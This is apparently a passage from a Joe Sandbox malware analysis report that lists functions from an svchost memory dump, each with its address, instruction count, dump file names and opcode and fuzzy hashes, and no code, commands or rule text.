                                                                                        • Opcode ID: becc32b973f815557c600ffe94f2dc2c2c36c233b1ad4376d2db4dc7bb90470c
                                                                                        • Instruction ID: af852c923492f18ace13c5bf36b6c3d6b958bb557a0766985fb4f539f2e2d757
                                                                                        • Opcode Fuzzy Hash: becc32b973f815557c600ffe94f2dc2c2c36c233b1ad4376d2db4dc7bb90470c
                                                                                        • Instruction Fuzzy Hash: 8DF08275911A949FEB21D7AEC584B11B7D9AF40674F0D85E1D405CB741CBA8D880C691
                                                                                        Function 03905227 Relevance: .0, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 38c07d58bd1d4a349948ab022b833b5418a5d703a026c0e55ada82bf59bf12a4
                                                                                        • Instruction ID: c72107c20caf633633d0d7020f782b4b5ccaeaf530709fbd803f86cbc9f2b949
                                                                                        • Opcode Fuzzy Hash: 38c07d58bd1d4a349948ab022b833b5418a5d703a026c0e55ada82bf59bf12a4
                                                                                        • Instruction Fuzzy Hash: 94F08274A14348AFDB14EBEDD905E6EB3B8AF44704F050498A901EF2C1EA74D9008756
                                                                                        Function 039051CB Relevance: .0, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 55af38e68440d590ea96d887f073219530ff4ba0359019f8feb860b5861f3e2e
                                                                                        • Instruction ID: 8a707e462a568a5eff4fc079a8f600d90bc11caa508af1e79c98d0adf802d5cc
                                                                                        • Opcode Fuzzy Hash: 55af38e68440d590ea96d887f073219530ff4ba0359019f8feb860b5861f3e2e
                                                                                        • Instruction Fuzzy Hash: C6F08274A1524CEFDB04EBEDD905E6EB3B8EF04304F040499A901EF2C1EA74E900CB56
                                                                                        Function 038AD070 Relevance: .0, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                        • Instruction ID: 8793014b1322a47ae8f8d55b291f9f164c8a3f80408503e4d58c12b261459ae5
                                                                                        • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                        • Instruction Fuzzy Hash: 06F0A03260461467C220AA4D8C05F5AFBACDBD5B70F10425ABA24DA1D0DA60A911D7D6
                                                                                        Function 038EF72E Relevance: .0, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0cdbe303ad1e626011dd94724206e35de65040391b19d27b865699dd62ec7bb0
                                                                                        • Instruction ID: b3cf750b30fdb00c66e9c01176e6a032961ca38a56973dbf8182fcaaa8bc0eca
                                                                                        • Opcode Fuzzy Hash: 0cdbe303ad1e626011dd94724206e35de65040391b19d27b865699dd62ec7bb0
                                                                                        • Instruction Fuzzy Hash: E3F08275A11348ABDB04EBE9D955E9E77B4EF08704F050094E641EF280E974D9019756
                                                                                        Function 03830710 Relevance: .0, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                        • Instruction ID: 998db245e0b4ca0e7d8ec596638ecd8510a45fc559e1cc568f74fcd5639abe4c
                                                                                        • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                        • Instruction Fuzzy Hash: F1F0ED7E3043489BDB16DF99C040AA57BA8EB42360B0440D4E842CB300EB72E982CBC1
                                                                                        Function 039037B6 Relevance: .0, Instructions: 27COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                        • Instruction ID: f05937ef5e747067ffac7c981f8dd09600cfc94ace041bb1866997ca3679e0a8
                                                                                        • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                        • Instruction Fuzzy Hash: B2E06D76210204AFE764DB58CD45FA673ACEB40760F180258B115D74D0DAB0AE40CA60
                                                                                        Function 038B4000 Relevance: .0, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                        • Instruction ID: 05ac9f38f272f3785a67f280ceb2b54b366fba09221d6d728d3b02b7fde71293
                                                                                        • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                        • Instruction Fuzzy Hash: 99E0C2343003068FD755CF5AC041BA6B7B6BFD5A10F28C0A8A8488F306EB32E843CB40
                                                                                        Function 038EB3D0 Relevance: .0, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                        • Instruction ID: bbe2c8b107f27e94284c0d29f3d73aeba8dd42dbb1bf50b23a4651f4d0619076
                                                                                        • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                        • Instruction Fuzzy Hash: 21E0CD35244318B7DB23AA84CC00F797B55DB417D4F104071FA08DEA50C5B19D91D6D5
                                                                                        Function 0382823B Relevance: .0, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                        • Instruction ID: b25870bfe444b599086fdd8d512d4d6d98eb5999fa18ba7b863a6e29cdbbfa06
                                                                                        • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                        • Instruction Fuzzy Hash: C6E08C35101B24EEDB31EFA9DC04B527AA6FF84B10F1448E9E0818A4A487B0A8D1DA45
                                                                                        Function 038B92BC Relevance: .0, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 83bf41b91c3c3ea5ec8f0b22ec48070caeb9b6cdb87728886319179163633f75
                                                                                        • Instruction ID: 84c13dc5e1c49a843ec369c64f504abb87daa158796be71e8dcdaa5d47706f7f
                                                                                        • Opcode Fuzzy Hash: 83bf41b91c3c3ea5ec8f0b22ec48070caeb9b6cdb87728886319179163633f75
                                                                                        • Instruction Fuzzy Hash: 79F0E534655B84CFE72ADF48C1E2B91B3B9FB99B44F510498D4468FBB1C73AA942CA40
                                                                                        Function 03832050 Relevance: .0, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0ba3ac633ca1edae2769fc017677c1bea51e82d6c4f5c088f2c57ae7e47a933e
                                                                                        • Instruction ID: f1f328b5338a2be32e7608f6baab5e55622000e0dec375486c370e2377e3e654
                                                                                        • Opcode Fuzzy Hash: 0ba3ac633ca1edae2769fc017677c1bea51e82d6c4f5c088f2c57ae7e47a933e
                                                                                        • Instruction Fuzzy Hash: 35E0C2332006546BC321FB9DDD00F4A739EEFA5360F004161F150CFAA0CA60AC00C7D5
                                                                                        Function 0382A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                        • Instruction ID: e6b1063d2d23711ac0d43cbc3afd2ae284f38cfe6b961503cde2a9b3389ba8ba
                                                                                        • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                        • Instruction Fuzzy Hash: 83D0223231213093CB2CE6D46800F63AD05AF80AA4F0A00AC380AD3800C8088C82C2E0
                                                                                        Function 038B930B Relevance: .0, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                        • Instruction ID: 02adc4d58c16dd82ba9f7b28e4e257c22cca9a0d2903e5ba261f8b78f55aa8ac
                                                                                        • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                        • Instruction Fuzzy Hash: 68D05E35945AC4CFE727CB08C165B907BF8F749B40F8910D8E04287BA2C37C9984CB10
                                                                                        Function 0386C700 Relevance: .0, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                        • Instruction ID: eb9e033027a3891ee232e60f2b6b20ed9d11edaa50639e63211638c6a0f712c2
                                                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                        • Instruction Fuzzy Hash: 3FC0123A290748AFC712EA98CD01F027BA9EB98B40F004061F2048BA70C671E820EA84
                                                                                        Function 03850310 Relevance: .0, Instructions: 11COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                        • Instruction ID: 267725e476671269c30ec3208ccc00b4b1b5956bd80acb6486e1b78b6004f5b2
                                                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                        • Instruction Fuzzy Hash: 60D01236100248EFCB01DF85C890DDA772AFBD8710F148019FD190B6108A31ED62DA50
                                                                                        Function 03830750 Relevance: .0, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                        • Instruction ID: c3eef8131cf127b254d0101ffe2eb05d233165d32f9020e660c8c5afd580d32b
                                                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                        • Instruction Fuzzy Hash: B0C04879B11A458FCF15EBAAD294F4977E8FB44740F1908D0E805DBB21E668F811CA11
                                                                                        Function 03874340 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c50324aba8d4f18421088d9a85102b1ea4a1cc003bed18f74713a350aa301588
                                                                                        • Instruction ID: 6158b953938e4fa65184f0695d7a8c08037a1e0db5d092e0d4ebae9a81823019
                                                                                        • Opcode Fuzzy Hash: c50324aba8d4f18421088d9a85102b1ea4a1cc003bed18f74713a350aa301588
                                                                                        • Instruction Fuzzy Hash: 97900231605804169140B29848C4586400697E0301BA5C051E1428558C8B148A5A5362
                                                                                        Function 03873090 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ef4ffc9438c59e4dc37354358044a92ac3edc74cc375faf691723a69ea16141c
                                                                                        • Instruction ID: 3d1187d38bc563b7cbd4c17935b5997db336238ece7132160f66065a62b4beee
                                                                                        • Opcode Fuzzy Hash: ef4ffc9438c59e4dc37354358044a92ac3edc74cc375faf691723a69ea16141c
                                                                                        • Instruction Fuzzy Hash: 5490022124140C06D140B29884547470007C7D0701FA5C051A1028558D87168A6966B2
                                                                                        Function 03873010 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e265b0bba5157aaca3da00da4293b1fc486099655846690ba24350ed6a0e77e8
                                                                                        • Instruction ID: 9338f67405f70701324fd1e09126289f1dfe839e626e3a3f6d771e9e89661978
                                                                                        • Opcode Fuzzy Hash: e265b0bba5157aaca3da00da4293b1fc486099655846690ba24350ed6a0e77e8
                                                                                        • Instruction Fuzzy Hash: 0F90022120184846D140B3984844B4F410687E1302FE5C059A515A558CCA1589595722
                                                                                        Function 03874650 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f7c8a36977247652879f550ddee12b9578b4832790836c7c2fd1bdc5a9dcb8e9
                                                                                        • Instruction ID: e9d410e665175180e69b3e718fbebb68f90b96d91e671e58a0181feb56aaa57d
                                                                                        • Opcode Fuzzy Hash: f7c8a36977247652879f550ddee12b9578b4832790836c7c2fd1bdc5a9dcb8e9
                                                                                        • Instruction Fuzzy Hash: EF900261601504464140B2984844446600697E13013E5C155A1558564C87188959926A
                                                                                        Function 03872B80 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 55b8cc4d39919cffa69eeb947e823d1b546fe9cfdf904133498191e4425c6da4
                                                                                        • Instruction ID: 462fb5687c83733fd99b6727755192341fd921f9fd980cd3e9d73034e817e194
                                                                                        • Opcode Fuzzy Hash: 55b8cc4d39919cffa69eeb947e823d1b546fe9cfdf904133498191e4425c6da4
                                                                                        • Instruction Fuzzy Hash: DC90023120140C06D104B29848446C6000687D0301FA5C051A7028659E976589957132
                                                                                        Function 03872BA0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57be65422121b3aae99a6192b79085ea92937f43b2e358562ce0a413452fd5a2
                                                                                        • Instruction ID: aeb0083f85f521cfc50d986b99ca2b242ee6568e5370659a94ca7e6c98eec3b6
                                                                                        • Opcode Fuzzy Hash: 57be65422121b3aae99a6192b79085ea92937f43b2e358562ce0a413452fd5a2
                                                                                        • Instruction Fuzzy Hash: 0290023160540C06D150B2984454786000687D0301FA5C051A1028658D87558B5976A2
                                                                                        Function 03872BE0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8c3ec4adfe2dfc28b3fad0a960952cc407efe6c96b6d11f4542b5d58d74b9ff7
                                                                                        • Instruction ID: baadac6c69362db8b3e1590f477fbf9c087852d8c3ecd9f8a537a422a6342e97
                                                                                        • Opcode Fuzzy Hash: 8c3ec4adfe2dfc28b3fad0a960952cc407efe6c96b6d11f4542b5d58d74b9ff7
                                                                                        • Instruction Fuzzy Hash: A790023120544C46D140B2984444A86001687D0305FA5C051A1068698D97258E59B662
                                                                                        Function 03872BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4c7312ddbb3afe5429c1155ced8956f1162fc0b6478b827c5c65c9913fb69af5
                                                                                        • Instruction ID: 7eb52d04d60ca75482778d91298d49fd108de93608ceab9f92ba9fe99ba145e6
                                                                                        • Opcode Fuzzy Hash: 4c7312ddbb3afe5429c1155ced8956f1162fc0b6478b827c5c65c9913fb69af5
                                                                                        • Instruction Fuzzy Hash: FE90023120140C06D180B298444468A000687D1301FE5C055A1029658DCB158B5D77A2
                                                                                        Function 03872AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8af71a0c041cae06db46504e0d89720cec618e9838dfc3b45fd3b2fd7f41c643
                                                                                        • Instruction ID: 2da6c230eff87bb7dbb46147d38c8aa6476482e71ed983d6d198c57b59f2d529
                                                                                        • Opcode Fuzzy Hash: 8af71a0c041cae06db46504e0d89720cec618e9838dfc3b45fd3b2fd7f41c643
                                                                                        • Instruction Fuzzy Hash: 2E9002A1201544964500F3988444B4A450687E0301BA5C056E2058564CC62589559136
                                                                                        Function 03872AD0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9ebf286e65d6254d4643b7ad5fc3dd27d83fd5ab9063691c3b63abd3fd38549a
                                                                                        • Instruction ID: 3e612b026a88bdadf96c965caab8a10e5884b125d13caf99908ce47cebabe6c2
                                                                                        • Opcode Fuzzy Hash: 9ebf286e65d6254d4643b7ad5fc3dd27d83fd5ab9063691c3b63abd3fd38549a
                                                                                        • Instruction Fuzzy Hash: CF900225211404070105F6980744547004787D53513A5C061F2019554CD72189655122
                                                                                        Function 03872AF0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f3d26ac2590f53fb2e7b61db498c26019477f93d1602c4a3759645fc8133d5b5
                                                                                        • Instruction ID: 2e005e8dfcbf40f37e06f926d40a31ea7daba89fbdb403189a3af244ea1b028d
                                                                                        • Opcode Fuzzy Hash: f3d26ac2590f53fb2e7b61db498c26019477f93d1602c4a3759645fc8133d5b5
                                                                                        • Instruction Fuzzy Hash: D8900225221404060145F698064454B044697D63513E5C055F241A594CC72189695322
                                                                                        Function 038739B0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 289bf1ffe0f8496261df41d343851d4143937c361b939e582aff7989bb602607
                                                                                        • Instruction ID: 7b53892a935c6c98fde2119ac745b18933cb459eba056d6fb0b0e582be190f68
                                                                                        • Opcode Fuzzy Hash: 289bf1ffe0f8496261df41d343851d4143937c361b939e582aff7989bb602607
                                                                                        • Instruction Fuzzy Hash: 2A90022124545506D150B29C44446564006A7E0301FA5C061A1818598D865589596222
                                                                                        Function 03872F90 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 99224844d09609cda847ec77872c587c77fb1478a8190df281f21249b47d4a8f
                                                                                        • Instruction ID: 71d17e0d2903fbab4afcaf945aa91b5834b15ebe84d9840b995263593ae47f91
                                                                                        • Opcode Fuzzy Hash: 99224844d09609cda847ec77872c587c77fb1478a8190df281f21249b47d4a8f
                                                                                        • Instruction Fuzzy Hash: DE90023120180806D100B298485474B000687D0302FA5C051A2168559D872589556572
                                                                                        Function 03872FA0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e6dfa647af551bed7951efa6bcec67c9c551ad7b537f6df5d1bf60dbe7f0bad2
                                                                                        • Instruction ID: a03f96251961d09c6a4d26868f6cdf0795f94211d39882ecdb03f438e23a7d82
                                                                                        • Opcode Fuzzy Hash: e6dfa647af551bed7951efa6bcec67c9c551ad7b537f6df5d1bf60dbe7f0bad2
                                                                                        • Instruction Fuzzy Hash: 7290023120180806D100B2984848787000687D0302FA5C051A6168559E8765C9956532
                                                                                        Function 03872FB0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
